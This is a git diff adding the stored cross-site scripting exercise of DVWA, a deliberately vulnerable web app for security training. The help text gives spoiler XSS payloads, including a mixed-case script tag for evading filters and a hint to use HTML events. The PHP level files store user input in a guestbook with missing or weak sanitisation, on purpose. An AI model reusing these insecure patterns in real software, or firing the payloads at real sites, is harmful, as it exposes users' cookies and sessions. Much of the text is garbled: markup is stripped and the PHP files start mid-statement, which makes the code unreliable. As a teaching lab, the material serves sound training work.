+ "Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. + XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, + to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output, + without validating or encoding it. + +An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, + and will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other + sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. + +The XSS is stored in the database. The XSS is permanent, until the database is reset or the payload is manually deleted. + ++ + Objective+Redirect everyone to a web page of your choosing. + ++ + Low Level+Low level will not check the requested input, before including it to be used in the output text. +Spoiler: Either name or message field: <script>alert("XSS");</script>.
+
+ + + Medium Level+The developer had added some protection, however hasn't done every field the same way. +Spoiler: name field: <sCriPt>alert("XSS");</sCriPt>.
+
+ + + High Level+The developer believe they have disabled all script usage by removing the pattern "<s*c*r*i*p*t". +Spoiler: HTML events.
+
+ + + Impossible Level+Using inbuilt PHP functions (such as ""), + its possible to escape any values which would alter the behaviour of the input. + |
+
+ +
Reference:
+
+
+ + " . dvwaGuestbook() . " +
+ +
\n";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/xss_s/source/high.php b/DVWA/vulnerabilities/xss_s/source/high.php
new file mode 100644
index 00000000..00ee1007
--- /dev/null
+++ b/DVWA/vulnerabilities/xss_s/source/high.php
@@ -0,0 +1,24 @@
+' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
+
+ //mysql_close();
+}
+
+?>
diff --git a/DVWA/vulnerabilities/xss_s/source/impossible.php b/DVWA/vulnerabilities/xss_s/source/impossible.php
new file mode 100644
index 00000000..9cf3f077
--- /dev/null
+++ b/DVWA/vulnerabilities/xss_s/source/impossible.php
@@ -0,0 +1,31 @@
+prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
+ $data->bindParam( ':message', $message, PDO::PARAM_STR );
+ $data->bindParam( ':name', $name, PDO::PARAM_STR );
+ $data->execute();
+}
+
+// Generate Anti-CSRF token
+generateSessionToken();
+
+?>
diff --git a/DVWA/vulnerabilities/xss_s/source/low.php b/DVWA/vulnerabilities/xss_s/source/low.php
new file mode 100644
index 00000000..94ff4b45
--- /dev/null
+++ b/DVWA/vulnerabilities/xss_s/source/low.php
@@ -0,0 +1,22 @@
+' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
+
+ //mysql_close();
+}
+
+?>
diff --git a/DVWA/vulnerabilities/xss_s/source/medium.php b/DVWA/vulnerabilities/xss_s/source/medium.php
new file mode 100644
index 00000000..cccefa31
--- /dev/null
+++ b/DVWA/vulnerabilities/xss_s/source/medium.php
@@ -0,0 +1,24 @@
+', '', $name );
+ $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
+
+ // Update database
+ $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
+ $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( 'Vulnerability: Stored Cross Site Scripting (XSS)
+ +
+
+ {$html}
+
+ + + " . dvwaGuestbook() . " +
+ +
More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/xss-filter-evasion-cheatsheet' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_scripting' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/xss-faq.html' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.scriptalert1.com/' ) . " +
' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + //mysql_close(); +} + +?>